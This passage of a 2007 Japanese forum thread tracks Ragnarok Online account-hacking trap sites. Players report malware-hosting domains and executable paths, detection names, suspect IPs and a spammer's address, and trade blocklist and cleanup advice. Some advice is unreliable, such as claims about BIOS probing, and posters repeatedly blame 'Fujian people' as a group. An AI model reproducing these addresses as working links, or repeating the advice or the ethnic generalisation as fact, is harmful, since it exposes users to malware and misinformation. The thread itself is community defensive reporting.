752 名前:(^ー^*)ノ〜さん:07/06/05 11:09 ID:uzqlmZDq0
>751のやつもClamWin(ClamAV)で検出。
ceshi■exe: Trojan.Spy-6001 FOUND

753 名前:にゅぼーん:にゅぼーん
にゅぼーん

754 名前:(^ー^*)ノ〜さん:07/06/05 19:28 ID:9twMpJ500
>>753
報告乙だけどギルド名っぽいものは
一応伏せておいた方が良かったんじゃないかな

755 名前:(^ー^*)ノ〜さん:07/06/05 20:02 ID:4PKu8DVo0
あぁっ、配慮が足りませんで申し訳ない
一応削除依頼出しておきます

756 名前:(^ー^*)ノ〜さん:07/06/05 20:12 ID:4PKu8DVo0
受理はやっ!ということで伏せて再度…
既出URLですが掲示板に書き込まれてたのでご報告

×××鯖で活動する「○○○○」は
■交流を深めながら楽しくROができるG
■Gvが終わったときに「楽しかったね」と言い合えるG
を目標に毎日みんなでわいわい楽しんでいます♪
こんな○○○○は一緒にROを楽しんでいく仲間を募集しています!!
詳しいG規約はこちら
http://www■rinku-livedoor■com/

書き込みホストは210■197■156■240からでした

757 名前:(^ー^*)ノ〜さん:07/06/05 21:58 ID:uzqlmZDq0
>書き込みホストは210■197■156■240からでした
OFSfb-23p1-240■ppp11■odn■ad■jp

あらら、またもやODNですかい。
ODNは愛されてるな。
そのIPをPingしたらタイムアウト。

とりあえずはODNへ苦情発射で良いかもね。

758 名前:(^ー^*)ノ〜さん:07/06/06 18:01 ID:RUXkDqyE0
pad-cache2-1.cache.telstra.net (HTTP_X_FORWARDED_FOR:222.78.86.228)(HTTP_VIA:1.0 pad-cache2 (NetCache NetApp/5.5R5))()

chaosx0■com
raginfo■com

ホスト名丸わかりなのに、PukiWikiのアンチスパムでも、改造して付け加えたAkismet、CAPTICHAでも防ぎ切れてねー(汗

759 名前:(^ー^*)ノ〜さん:07/06/06 18:45 ID:nL7ASlLe0
>758
なんちゃって餃子板はリネージュ資料室にも載ってなかった。
なんちゃってraginfoはよく判らない。

www■chaosx0■com/roblog/
 ↓
www■raginfoy■com/roblog/ro■exe

raginfoyはまとめサイトにものってる既知のアドレスで、なんちゃって餃子板のも
こっちを読んでた。
パッと見、昔風の手口っぽい?

760 名前:(^ー^*)ノ〜さん:07/06/06 18:58 ID:kgZIaB1X0
chaosx0はおなじみ福建人のもの、ドメイン名から罠と判断できずに見落としだろうね。
WHOISで一目瞭然。

ro■exeは18時55分のVIRUSTOTALではシマンテックが検出していない。
マカフィー、カスペは検出。

761 名前:(^ー^*)ノ〜さん:07/06/06 19:07 ID:kgZIaB1X0
758のtelstra■netだけど、これはホスト規制しておいた方がいいね。
福建人御愛用プロキシなのは間違いないところだし、国外だから規制の影響も無いだろう。

762 名前:(^ー^*)ノ〜さん:07/06/06 20:57 ID:ZwhUWDcc0
LiveROとこっちとどっちにしようか迷ったけど、とりあえずこっちに。
LiveROのほうで中韓台リストを入れて「つながらないんです〜」って話題が
またあったのを見て、こうしてみたらどうだろうと思ったので書き込んでみる。

まとめサイトのPG2の導入の最後の部分に、
http://sky.geocities.jp/vs_ro_hack/pg2.htm

>補足:
> このサイトにアップロードされているリストと併せて、
> リネージュ資料室様にアップロードされているリストも登録しておくことをおすすめします。
> (上記画像中では既に登録済みになっています)。

っていう一文が入っていて、リンク先に飛ぶとリネージュ資料室の遮断リストのページ
http://lineage.nyx.bne.jp/misc/security/?id=url-ip
に飛ぶようになってる。

で、ここに中国・韓国・台湾の全ブロックも書かれているので、
素直にそのまま導入する人が多く、上にあるような質問が何度も出るのだと思われる。

リネージュ資料室のほうには別ページにあるPG2の導入解説のところに、
http://lineage.nyx.bne.jp/misc/security/?id=basic-ipfilter#PG2

>なお、ここで説明した設定では中国や韓国のIPアドレスとの通信すべて遮断するため、
>韓国のリネージュ関連サイトにアクセスしたい場合などにも、遮断されてしまいます
>(翻訳サイト経由のアクセスの場合には遮断されません)。
>その場合には、次の手順でアクセス許可することができます。( 以下方法の説明)

と、中韓台のリストについての説明があるので、
同様にそのあたりの説明をまとめサイトのほうへも付け加えておくと
「よくわからないけどPG2入れてみよう」という人には懇切丁寧さがますますUPなのではないかと
ちょっと思ったんだが、まとめサイトの方、どうでしょう…

763 名前:(^ー^*)ノ〜さん:07/06/06 22:03 ID:n9z8D6Fe0
実際のところ、既知の罠サイトの国別分布はどんなものかなと思ったので、ちょっと調べてみました。
リネージュ資料室の「Lineageトロイ」リストの最初の100件について、
「中国・韓国・台湾」リストのみをブロック状態にして、pingを打ってみました。その内訳は

中国 80件
韓国 3件
香港 2件
台湾 1件
スルー 14件

予想通り、中国が飛びぬけて多かったです。
このスレとセキュスレで「PG2にブロックされました。大丈夫でしょうか?」という質問はKoreaが多いような気がしますが、
100件中3件程度で韓国を一国丸々ブロックする価値があるのかなと思いました。

中国のみのリストを作りたい場合は、「中国・韓国・台湾」リストをダウンロードして、
中国以外の部分を削除した後、ローカルファイルとしてリスト追加すれば良いだけではありますが、
初心者に勧めるにはちょっと敷居が高いかなあ。

764 名前:(^ー^*)ノ〜さん:07/06/06 22:05 ID:XHeDGXf60
そこまで心配するなら中国のみファイルをつくって配布すれば?

765 名前:(^ー^*)ノ〜さん:07/06/06 22:07 ID:vRWbPvnX0
>>760
NOD32でも、Win32/PSW.Maran.EI として検出してます。一安心。(なにが?)

766 名前:(^ー^*)ノ〜さん:07/06/06 22:12 ID:LkBI8sU50
>>763
じつはBSWikiさんとこにこんなのが。
http://smith.xrea.jp/files/vir-domain_lookup.html.gz
中国が飛びぬけて多いのは同じ結論みたいですけどね。

767 名前:(^ー^*)ノ〜さん:07/06/06 22:42 ID:pfC8Jgv10
>762
まとめサイトからリネ資料室に飛んだページ(危険URL - 危険IP)には
>利用法については「基本の対策 - IPフィルタ」を参照してください
とリンクがある。

そして「基本の対策 - IPフィルタ」ページには
>なお、ここで説明した設定では中国や韓国のIPアドレスとの通信すべて遮断するため
とある。

つまり説明をちゃんと読んでたら、そういうトラブルは出ないと思うんだ。

PG2も、hostsの更新も、hostsの更新スクリプトにしても、この手のものは「理解した上で
自分で使う」事が大切。

緊急を要するから対策を先、理解は後回し、ってのでも構わないけど、最低限説明ぐらいは
読まないとダメだと思う。

768 名前:(^ー^*)ノ〜さん:07/06/06 23:50 ID:ZwhUWDcc0
最低限説明を読めというのは正しいと思う。

しかし、現にそこで引っかかって助けを求めてくる人が存在するわけで、
いったい何故そんなことを質問してくるのかということをシミュレートすると、
>利用法については「基本の対策 - IPフィルタ」を参照してください
の先に飛んでわざわざ読まない人があるわけだ。

これは実際にユーザー(閲覧者)に飛んで読むことを期待してるわけだが、
実際にはそれが活用されていないという現実があるということだ。

では、閲覧者に対して「お前が説明を読まないのが悪い」というのは正論だが、
リンクで飛ぶ前に注意を促せるならば、そこで一言添えたらいいんじゃないかと
一つの提案として書いてみたんだ。

これはこのことに限った話じゃなくて、セキュリティに関して詳しくない人、慌てている人
ろくに理解しようとしない人までフォローしようと思ったらそういう方向に動いたほうが
基本コンセプトに合っているのではないか。という個人的な考え方からきているもので、
わざわざボランティアで動いているまとめサイトの人にそこまで要求するのはどうなの?
という気持ちも一方であるので、判断はまとめサイトの人にまかせる。

769 名前:(^ー^*)ノ〜さん:07/06/07 02:02 ID:ActuFWxg0
>>759-760
でかっ(151kB)。圧縮していない裸のMaran(RO+リネージュ)でした。

770 名前:(^ー^*)ノ〜さん:07/06/07 15:57 ID:OF/7pG7c0
アコプリWiki(本家)でまた改竄発生。
どこにもリンクされて無いページ(Frontpageならぬfrontpage)だったから被害は無いはず。

内容は自動投稿SPAM+Tyr鯖GvWikiをパクったもの。
ハクアドレスは殆どがa-hatenaでdin-orがポツポツ。

その中に見慣れない exblog.jpとfc2.com のが3つほどあったので、新規サイトか?と
調査に行ったら、tyrで活動中の人の本物のblogでしたorz

そりゃリンクが数10個もあったら見落としが出るのは判らないでも無いが……

書き換えるなら全部書き換えろヽ(`Д´)ノ

771 名前:(^ー^*)ノ〜さん:07/06/07 16:34 ID:ElmD2zKn0
木を隠すなら森の中ってことだな…

772 名前:(^ー^*)ノ〜さん:07/06/07 21:05 ID:guD7IWDb0
そういやウイルスにかかるとその時点でIDパス取られちゃうの?
それとも感染したままRO起動すると取られちゃうのかな

773 名前:(^ー^*)ノ〜さん:07/06/07 21:06 ID:BGquGI4e0
>>772
ログ読んで下さい

774 名前:(^ー^*)ノ〜さん:07/06/07 21:07 ID:hSrEro740
キーロガーがどんなものか勉強し直せ

775 名前:(^ー^*)ノ〜さん:07/06/07 21:10 ID:guD7IWDb0
なんだ、キーロガーなのか、理解

776 名前:(^ー^*)ノ〜さん:07/06/07 21:50 ID:GNMOBH5+0
デスクトップとか特定のフォルダにあるファイルを盗むタイプに感染
  +
そこにIDやパスワードを書いたファイルを保存していた
  +
そのファイルを垢ハック犯が見た


これくらい偶然が重なれば感染した時点で取られるな

777 名前:(^ー^*)ノ〜さん:07/06/07 21:53 ID:hSrEro740
まーでも中華が何仕込んでくるか分からん以上
その位警戒しておいていいんじゃね?<感染した時点でパス抜かれる
現状は感染したら別PCからパス変更でOS再インスコで大丈夫だけど。

778 名前:にゅぼーん:にゅぼーん
にゅぼーん

779 名前:(^ー^*)ノ〜さん:07/06/08 01:19 ID:AzuyKSPz0
↑これなんだ?jpgだし、どうもジャニ掲示板にメインに貼られているようだが・・・
あと後藤まき・上戸彩は女じゃないのか?

780 名前:(^ー^*)ノ〜さん:07/06/08 01:27 ID:AzuyKSPz0
む、既に削除依頼済みか。乙と言わざるをえない

781 名前:(^ー^*)ノ〜さん:07/06/08 09:05 ID:hOeDsitA0
福建人の罠ブログ、記事中、コメントに罠入り。
言うまでも無く記事はパクリの寄せ集め。
blogs■yahoo■co■jp/sunny8787jp2000/

782 名前:(^ー^*)ノ〜さん:07/06/08 12:05 ID:Tsqf3lzL0
>781
aehatena-jpのリンクがあるのを確認。

www■aehatena-jp■com/news/100658432/
svch■exeが置いてあった。

階層掘ってる辺り、偽装なんだろうなぁ。

783 名前:(^ー^*)ノ〜さん:07/06/08 17:09 ID:vqa+L/FY0
>>781
今見たら削除されている。管理側によるものだと思うんだけど、対応はやっ。
fc2は言わずもがな、exblogよりも遥かに迅速。柔銀系のくせにやるなー。

ちなみにaehatena-jp以外にも
grandchasse■com, ragnarok-sara■com, extd-web■com, game-mmobbs■com,
18girl-av■com, aurasoul-visjp■com, slower-qth■com
が有ったのを報告。

784 名前:(^ー^*)ノ〜さん:07/06/09 22:48 ID:z9zbsB2r0
www■blogplaync■com/
なんか最新ぽい奴みたいなので報告(´・ω・`)
すでにあったらすみません

785 名前:(^ー^*)ノ〜さん:07/06/09 23:54 ID:aL50zfOV0
うん、あるね…

786 名前:(^ー^*)ノ〜さん:07/06/10 02:14 ID:q1oyy/8u0
とりあえずスレ内検索だ

787 名前:(^ー^*)ノ〜さん:07/06/10 05:14 ID:K+dSylLZ0
ROとは全く無関係な絵描きコミュニティサイトのお絵描き掲示板にて
過去に投稿されたイラスト+コメントにアカハックURLはられてました(;´д`)
現行スレ+まとめサイトの一覧の検索かけてなさそうだったので報告。
http://www■amatou-fc2■com/

788 名前:(^ー^*)ノ〜さん:07/06/10 07:59 ID:S358hNm/0
>>787
ドメイン登録情報が変わったね、BIZCN登録に替わっている。
やりかたと言い福建人ので間違いないだろうが。
URLぐぐると刀剣売買でのカキコがヒットしたが、典型的なパクリ具合がよく分かる。
手口として覚えておいて損は無い。
ログが数ページに渡る掲示板の場合、1ページ前とか1年前とかのものを悪用する。

これをぐぐるよろし、最初に2件ヒットするはず。
”日本刀・骨董品買います!”
上がパクリ、下が原文で同一掲示板の半年くらい前のをパクっていることが明白。
日本人は過去のなんて見ないだろうと言う福建人の日本人に対する考えが伺える。

789 名前:(^ー^*)ノ〜さん:07/06/10 22:02 ID:crIBNkCm0
なんだこりゃ。ROと関係ない一般人も踏んじまうじゃねえか。

790 名前:(^ー^*)ノ〜さん:07/06/11 00:19 ID:z70XgkTA0
アカウントハック受けてOS再インストしてもまたホスト攻撃されてトロイやらバックドアやら
スパイウェア送りつけてくるんだけどこれ警察いったほうがいいかね?

791 名前:(^ー^*)ノ〜さん:07/06/11 01:38 ID:0U2+MA7Q0
>>790
そう判断した理由が不明。LiveROのセキュスレで相談しろ。誤認の可能性もある。

792 名前:(^ー^*)ノ〜さん:07/06/11 01:55 ID:klJOSUQV0
ルータのログを初めて見たんだろ

793 名前:790:07/06/11 02:40 ID:n6LJFLq10
今もずっと戦ってるんだけど・・・
スパイウェアドクターとavast再インスコ後速攻でいれたのにしばらくすると攻撃受けてます
の表示がでる。そしてトロイが次々と送られてきてavastじゃ通り抜けられてるんだ
マジ勘弁IPが色々相手変わりながら攻撃してくるしどうにかなんないか?
まともにネットさえできない状況なんだ

794 名前:(^ー^*)ノ〜さん:07/06/11 03:08 ID:2FfW19GR0
そういえばこの前久々にアナログモデムでネットしたら(=ルータやFW介さない丸腰)
10分おきにウイルスバスターがネットワークウイルスをブロックしたと報告してきて
ちょっとびびったな(ウイルスはLSASS_EXPLOITなど数種)。固定IPでもDDNSでもないのに。

もはや多少の攻撃を受けるのはネットでは当たり前なのか。

>>790
とりあえずセキュスレでウイルス名晒してみたら?

795 名前:(^ー^*)ノ〜さん:07/06/11 03:08 ID:pdbERKbE0
>>793
警告メッセージやらダイアログ等に有るであろう参考URLをそのまま貼り付けてみ。
それだけじゃ汝の為したい様に為すが良い、としかいえない。助言もへったくれも
出来んのよ。情報が欲しい時は出来る限りの情報を提供し、何らかの判断を
していた場合はそう思った根拠も示す。質問時の一般的な基本だゾ。

微妙なところも有るんでセキュスレの方が良い鴨試練。

796 名前:(^ー^*)ノ〜さん:07/06/11 03:08 ID:nBBzdTSw0
それだけじゃわからんなぁ、環境も書いてくれないと
少なくともルーター、FW、PG2は入れてるのかどうかとか
どんなトロイだとかどういう攻撃かとか

797 名前:(^ー^*)ノ〜さん:07/06/11 04:33 ID:JvGrFcCn0
OS再インストールだけやって、WindowsUpdate未完のxp SP1以前なんじゃないか。
これなら脆弱性攻撃の対象になってもおかしくない。

798 名前:790:07/06/11 05:35 ID:s05UqNeb0
>>797
最初そうでうpデート中に送られまくってトロイ送られまくった・・・
やっととりあえず攻撃なくなったよ・・・攻撃対象になるとこれほどひどいもの
なのかと思う
なんとかスパイウェアドクターとFWとavastとwindowsうpデートしてから攻撃止まったけど
トロイがまだ中にいっぱいいるからしばらく攻撃されないか様子みて再インスコしなおしだなー・・・
対象リストからはずれてくれればいいが・・・・
垢ハックされる前は丸裸PCだったからそれで対象になっちゃったのかな・・・
本当次から気をつけないとだ・・・
でも常駐系だと低スペックPCだからゲームするの難しいんだよな・・・
あの攻撃の仕方は間違いなく中華だぜ・・・・
Backdoor.Rbot ってやつの処理が大変だった・・
もう朝だぜまいったな・・・

799 名前:(^ー^*)ノ〜さん:07/06/11 05:41 ID:nBBzdTSw0
WindowsUpdateのファイルを個別に落として焼いておいたら良いんじゃ?
再インストール後にそのCDから適用すればそれまでの脆弱性は防げるかと
Microsoftダウンロードセンターで個別DL可能な

800 名前:790:07/06/11 05:49 ID:s05UqNeb0
>>799
なるほどー
今までこういう事には無縁だったから良い薬にはなったかな・・・
ゲームのID3つ消されたしさすがに今度はちゃんと対策するわ
トロイがavastだと検知しても除去できないからノートン買うか・・・
お騒がせしてどうもでした

801 名前:(^ー^*)ノ〜さん:07/06/11 06:06 ID:nBBzdTSw0
…反映されてない、上げで出るかな

802 名前:(^ー^*)ノ〜さん:07/06/11 09:04 ID:pdbERKbE0
いろいろ言いたい事は有るけど解決って言っているので触れません。

MSのパッチファイルを落とすならhttp://wud.jcarle.com/
Windows Updates Downloaderが便利。使い方は自分で調べてね、
難しくないから。

因みに、悪意のPC侵入攻撃は基本的に無作為アタックです。つまり、あなたが
攻撃されているのではなく皆が(ほぼ同等に)攻撃されている訳。無警戒な
状態は故にとても危険と言える訳。
攻撃者はアジアも多いですが、そうでない者も多数。一概にはなんとも。

垢と装備だけで済むレベルでいい勉強が出来たのは本当に運が良かったし
今後の為になったかと思いますよ。

803 名前:(^ー^*)ノ〜さん:07/06/11 09:58 ID:0U2+MA7Q0
790氏よ、いい加減、LiveROへ移動してくれ。一般的なセキュリティの話題はあっちだ。

>重要な情報が埋れてしまわないようにする為、一般的なセキュリティ
>対策・相談・雑談は>>2に有る雑談スレを利用して下さい。

あと、スパイウェアドクター自体がちょっと疑惑のあるソフト(類似のシステムドクターは真っ黒)なので
一旦外して、他のものを導入してみることをお勧めする。(SpybotとAd-Awareなら大丈夫)


続きはこっちで頼む。マジで。

セキュリティ対策、質問・雑談スレ2
ttp://enif.mmobbs.com/test/read.cgi/livero/1177485590/

804 名前:(^ー^*)ノ〜さん:07/06/11 17:36 ID:BHEqxLGG0
まぁ・・・場違いスレ違いなのもわかるんだが、ここまで疑心暗鬼に
ならざるを得ない状況も状況なんだよなぁ・・・

既にたかがネット、たかがゲームと言ってられない状況なのに
結局信じられるのは自分の知識とツールだけってのもな・・・

805 名前:Logue ◆grDYeooZwg:07/06/11 20:08 ID:dTf7D6540
EventWikiでこんなアクセスを確認・・・。
166.136.143.219.broad.bj.bj.dynamic.163data.com.cn (HTTP_VIA:1.1 wa01proxy02.ezweb.ne.jp, HTTP/1.1 cc1[AC1AAAA0] (Traffic-Server/5.2.2-55205 [uSc ]))()

UAはUP.Browserになっているが、どうも怪しい。
ezwebはハクられてないか?(なぜかUAがドコモになってたのもあるし)

806 名前:(^ー^*)ノ〜さん:07/06/11 20:44 ID:P6jH0cPd0
>>805
どの文字列がどの環境変数に相当するのかその内容だと全然判らないので、
なんともいえないなぁ。HTTP_なブツはほぼ簡単に偽装できるし。詳細きぼん。

807 名前:(^ー^*)ノ〜さん:07/06/11 21:05 ID:4yelBVpe0
>163data.com.cn

これだけでおなかいっぱい

808 名前:(^ー^*)ノ〜さん:07/06/11 21:17 ID:uOCPYXEx0
Viaなんかは自称ヘッダだからね。(Forwarded-Forとか)

それらは "普通"は proxyが付加し、proxyを通過した場合はremote_addr(host)がproxyのアドレスを、
Forwarded-ForだとかViaだとかには元アドレス関連情報っていう使い方になるわけで、
なるべくアクセス元に近い情報をチェックしたいというスクリプトなんかはForwarded-ForやViaがあった場合は、
そっちの情報を記録したり、チェックしたりする場合もあったりする。

また、匿名性の無い普通の(というか?)proxyサーバは、受けとった追加ヘッダは、そのまま送る。

それを逆手にとって、自前でForwarded-Forを書いてPOSTするなんてこともあり得る。

というか…だいぶ昔のLet's RAGNAROKの掲示板(c-board)では、実際そういうことが起こっていて
go.jpだの.govだのをREMOTEとして表示されている投稿がいっぱいあったよ('A`)

809 名前:(^ー^*)ノ〜さん:07/06/12 00:50 ID:uTtoxXcr0
>>794
いまは何もパッチをあててないPCをネットに繋ぐと30分もしないうちに感染するぞ

810 名前:(^ー^*)ノ〜さん:07/06/12 01:23 ID:ME4y+7B/0
俺のされたHACK経験からするとHACKERはまずbiosから相手がセキュリティ甘いかどうか
調べてくるからパーソナルファイアウォールいれてれば問題ないと思う
そこでブロックされたら諦めて帰っていくやつが多かったぜ
一応貼っとく
http://dorubako.nishitokyo-city.com/muryo_firewall.html

811 名前:(^ー^*)ノ〜さん:07/06/12 01:35 ID:ci8PhMH20
【  アドレス   】 http://www■aaa-livedoor■net/ro-navi/
【気付いた日時】 踏んだあとすぐに
【     OS    】 WindowsXP Service Pack2
【使用ブラウザ 】 IE、バージョンは不明だが恐らく最新版
【WindowsUpdateの有無】 一応有
【 アンチウイルスソフト 】 avast!
【その他のSecurty対策 】 特になし、今後導入予定
【 ウイルススキャン結果】 avast!にて現在実行中、カスペルスキーも行う予定
【スレログやテンプレを読んだか】 Yes
【hosts変更】無し
【PeerGuardian2導入】無し
【説明】
ふたばちゃんねるにそれらしきスレが立てられており、若干酔っていたこともありついうっかり…
avast!の警告があり即座に遮断はしました。それ以降ROへの接続は行っていません。

812 名前:(^ー^*)ノ〜さん:07/06/12 01:49 ID:ME4y+7B/0
無料ソフトで固めるならスパイボットとavastと壁だな
知らない人のために
avast
http://www.avast.com/jpn/download-avast-home.html
spybot
http://enchanting.cside.com/security/spybot1.html

813 名前:(^ー^*)ノ〜さん:07/06/12 01:52 ID:cAv8BwWX0
>>811
セキュリティソフトが反応し、その反応に応じて遮断した場合、セキュリティソフトにバグがない限りは
「反応したウィルスに対してのみ」は防御できていると思われる。

安心の為に他社オンラインスキャンをかけるか、ブロック出来たことだけで安心するか、
HDDをフォーマットしてOSから入れなおすかは、全て自己責任で判断すること。

814 名前:(^ー^*)ノ〜さん:07/06/12 02:00 ID:jpVCOmRl0
>>811
HACKされた経験のある俺からするとavast!だけでは全てのトロイに対応できなかったので
FWとかがブロックとかその後反応してるのならスキャンを進める
トロイやらbot入ってると自動送信行うからFWが反応してたら危険

815 名前:(^ー^*)ノ〜さん:07/06/12 02:05 ID:ci8PhMH20
>>814
その後は一応何の反応もありませんが…avast!が終了次第カスペルスキー使います

816 名前:(^ー^*)ノ〜さん:07/06/12 02:41 ID:jpVCOmRl0
>>815
なら問題ないと思われる
壁あるなら絶対何かしら反応あると思うので

817 名前:(^ー^*)ノ〜さん:07/06/12 17:42 ID:IUK2GH+a0
avast!に関しては一般に言うFW機能はIDS機能とWebフィルタ位なので
絶対というような過言は出来ません。 IDS機能の説明でも
『このモジュールはよく知られたインターネットワーム/攻撃から保護します』
とあります。過信は禁物。

この世界にそういう方面の『絶対』は有りません。

818 名前:Logue ◆grDYeooZwg:07/06/12 18:57 ID:bOVDKMaB0
>>808
うーむ。てっきりezweb.ne.jpをハックして踏み台に使って書き込もうとしたまではいいが、
実際は、漏れ串で投稿できなかったというオチを期待していたが・・・、

勝手にezweb.ne.jpを詐称しているのか?これ。

819 名前:(^ー^*)ノ〜さん:07/06/12 20:12 ID:Gn/DtMXS0
今回のwa01proxy02.ezweb.ne.jpは単純に、多段串の1つに使われただけの話では…

820 名前:(^ー^*)ノ〜さん:07/06/12 22:43 ID:IUK2GH+a0
>>818
いや、だから806の指摘のように、詳しいログでもないとあなた以外は
何もいえないと思うぞ、と。分析は正確な情報が無ければ無意味となる。

そして、セキュスレ向きの話題かとも思う。

821 名前:(^ー^*)ノ〜さん:07/06/13 14:01 ID:8pwK/0pY0
国内サービスを悪用した福建人の罠ブログ発見。
ここのブログサービスは宣伝以外のリンクを貼れない?
タイトルは”RO Blog最近日記”、ぐぐればこれを含め、FC2の罠ブログが上位に出る。
csfir■269g■net

今年4月に登録、ブログタイトルと内容が全く一致しない。
特に4月の最初の2件はどこからどう見てもどこかの教えてサイトのパクリ。
最新の記事もパクリ、タイトルをぐぐって確認。
コメントが1つあるが、言うまでもなく福建人のウィルス。

試しに6月10日の記事のタイトルをぐぐって見ると良い、スポーツ新聞の記事丸パクリ。
”「ナントカ還元水」商標登録申請されていた”
やり方から間違いあるまい。

ある程度の記事数を用意して信用させようとしていると考えられる。
上のようにリンクが貼れない?のか様子をみて罠入りブログに変化させるかを測っているものと推測。

822 名前:(^ー^*)ノ〜さん:07/06/13 16:34 ID:QrIDqW3G0
>>821 (csfir■269g■net)

| このブログは事務局により利用を凍結しています。
| このブログは下記の理由などにより凍結されています。
| ・規約上の違反があった。

いい仕事してますね。

823 名前:(^ー^*)ノ〜さん:07/06/13 20:08 ID:gR3dMkfr0
なぁ聞いてくれ
今さっき仕事からかえってきてメッセ(msn)INしたんだけど
なんか明らかにしらん中華っぽいサインネームで登録がきてたんだ・・・
これってなんかハックと関係あるのかな?
別PCで自分のアカウントは無事なのは確認したんだけど・・・

824 名前:(^ー^*)ノ〜さん:07/06/13 20:15 ID:5NVXfpSz0
向こうで無碍にされたからってこっち持ってくるなよ

825 名前:(^ー^*)ノ〜さん:07/06/13 21:44 ID:zTLgIDVs0
>>823
>一般的なセキュリティ対策・相談・雑談は>>2に有る雑談スレを利用して下さい。

無関係にランダムに送り付けられているもの。気にせず拒否っとけ。

826 名前:(^ー^*)ノ〜さん:07/06/13 21:52 ID:gR3dMkfr0
大変失礼しました(´・ω・`)

INしてみたら近い人でも3〜4人いたようで。。。
あちらのほういってみます

827 名前:(^ー^*)ノ〜さん:07/06/13 22:05 ID:5NVXfpSz0
いや、既に向こうでも同様の質問が出ていて「気にするな」で終わってるんだわ
それでこっち来たのかと思ったんだが勘違いだったようだ、すまん

828 名前:sage:07/06/14 13:36 ID:4OKiQhli0
質問なんですが ナイト ステUP板 で検索
上から二番目をクリックしたら英語でWARNINNGって出たんですけど、
これって垢ハックでしょうか?もしそうだったら対処法など教えてください。
よろしくお願いします;;

829 名前:828:07/06/14 13:38 ID:4OKiQhli0
すいません!間違って名前のところにsageと・・・

830 名前:(^ー^*)ノ〜さん:07/06/14 13:45 ID:f+LF33n80
>>828-829

>>1
>※ このスレは『勇気が無くて見れないサイト解説スレ』ではありません

このスレでもLiveROのセキュスレでも対応範囲外。
検索サイトによっても順番は変わるが、グーグルで検索した2番目だと出ないな。

取り敢えず、セキュスレへ行って「怪しいサイトに思えた場合の対処法」を読んで来い。

セキュリティ対策、質問・雑談スレ2
ttp://enif.mmobbs.com/test/read.cgi/livero/1177485590/535

831 名前:(^ー^*)ノ〜さん:07/06/14 14:39 ID:voA/Ijzh0
>>828-829
とりあえずはっきりした事がわかるまで
RO繋ぐのはやめとけ、とだけは言っておく。

832 名前:(^ー^*)ノ〜さん:07/06/14 15:48 ID:Pjosww4ZO
830 831さん
返答ありがとうございました。とりあえずRO繋ぐのやめてセキュリティスレ行ってきま

833 名前:(^ー^*)ノ〜さん:07/06/19 19:44 ID:vynyf2vI0
最近情報が途絶えてますが落ちついてると見て良いのかな
ついでに少し下がり気味なので上げておきます

834 名前:(^ー^*)ノ〜さん:07/06/19 20:04 ID:836ZoCps0
カムバックキャンペーンで、休止中の人はアカハック騒ぎ知らない人も多いだろうから、
既にかかっていた人やちょっとWiki見てから繋いで見るかーと言った人に被害出る可能性も多数あるな。

835 名前:(^ー^*)ノ〜さん:07/06/21 10:08 ID:/ixquR/I0
この報告無し状態が逆に怖いねぇ。
各種Wikiとかが対策されてるから貼り付け被害が軽減してると思いたい。

ただ癌の海外発行クレカの使用禁止とMPACKの事を考えると、そのうち
アウトブレイクしそうでこれまた怖い。

それとリネージュ資料室さんに、報告されてたので転載。
資料室さん、サイトリニューアルしてたんだね。

www■goooog1e■cn

836 名前:(^ー^*)ノ〜さん:07/06/21 16:15 ID:Yn583UIz0
海外発行カードの利用停止も、遅きに失した感が強いけど。
CardSystem社の流出事件から丸2年、福建の連中等が手を出していないとは考えにくい訳で。
それに、明細到着のタイムラグや、提携-イシュア間のプロセスが余分に必要な部分も含めて、国内カード以外を
行使するメリットが薄い。

837 名前:(^ー^*)ノ〜さん:07/06/21 19:11 ID:cr7b6QKe0
>>835
リネージュ資料室がそのアドレスになったのかと一瞬勘違いした。
よく見れば怪しさ爆発だったけど。

838 名前:(^ー^*)ノ〜さん:07/06/21 22:09 ID:RujmrWVG0
爆発した後の残骸くらい怪しい

839 名前:(^ー^*)ノ〜さん:07/06/22 08:54 ID:l5srdgKO0
【  アドレス   】 http://23840■polinrhueshishuerinda■com/99/67773/
【気付いた日時】 2007/06/22
【     OS    】 WindowsXP HomeEdition SP2
【使用ブラウザ 】 IE6.0
【WindowsUpdateの有無】 自動インストールON 2007/06/22に確認したが特になし。
【 アンチウイルスソフト 】 K7 ウィルスセキュリティ
【その他のSecurty対策 】 Spybot S&D
【 ウイルススキャン結果】 現在進行中
【スレログやテンプレを読んだか】 読んでる最中
【hosts変更】無し
【PeerGuardian2導入】無し
【説明】
知らない人からメッセで話しかけられ
My pirty pics; アドレス
という形で張られてきた。返答などには反応無し。
アドレスクリックしたところ何かのファイルをDLするか否かのページに。
ちなみに相手のアドレスはreia1209@hotmail■co■jp
相手の名前はsakura@〜〜(日本語で変な詩みたいの書いてある)
相手に心当たりは無い

840 名前:(^ー^*)ノ〜さん:07/06/22 08:58 ID:Pyq6Ib290
知らない相手から送られてきたアドレス踏むなんて不注意にも程があるだろ・・・

841 名前:(^ー^*)ノ〜さん:07/06/22 09:02 ID:l5srdgKO0
その前日メッセをギルメンに教えててそれかと思ってついな・・・

842 名前:839:07/06/22 09:45 ID:l5srdgKO0
アドレスをクリックした際にDLさせられそうになるpic.pifと言うファイル。
調べてみたらワームの一種らしいので上記アドレスに飛ぼうという猛者は気をつけて。
いないだろうけど。

843 名前:(^ー^*)ノ〜さん:07/06/22 10:01 ID:bYVValr+0
>>842

W32.Stration.CX@mm
http://securityresponse.symantec.com/ja/jp/security_response/writeup.jsp?docid=2006-101910-1040-99

844 名前:(^ー^*)ノ〜さん:07/06/23 23:02 ID:CxwVCcYk0
そういや647氏だっけ 垢ハックされて警察言ったけど相手されなかった人
今はしっかり話聞いてもらえたのだろうか
知ってる人居たら教えて

845 名前:(^ー^*)ノ〜さん:07/06/23 23:04 ID:qWDldW1b0
LiveROの方でしばらく報告続けてたけど最近みないなぁ、というわけで続きはあちらで

846 名前:(^ー^*)ノ〜さん:07/06/26 12:54 ID:uE6dV61M0
【  アドレス   】 ttp://www■aaa-livedoor■net/cett/
【気付いた日時】 踏んだ直後
【     OS    】 WindowsXP HomeEdition SP2
【使用ブラウザ 】 IE
【WindowsUpdateの有無】 自動インストール
【 アンチウイルスソフト 】 K7 ウィルスセキュリティ
【その他のSecurty対策 】 無し
【 ウイルススキャン結果】 踏んだときにセキュリティソフトが反応、ファイルを削除
【スレログやテンプレを読んだか】 今から読みます
【hosts変更】調べましたが意味がよくわかりませんでした
【PeerGuardian2導入】無し
【説明】
三国志オンラインのWikiを見ていたところ、不覚にも踏んでしまいました・・・。
セキュリティソフトが反応したとはいえ、不安なのでPCクリーンインストールしてきます。

847 名前:(^ー^*)ノ〜さん:07/06/26 12:59 ID:Cnp6cGCs0
IEのバージョンを書けよ・・・

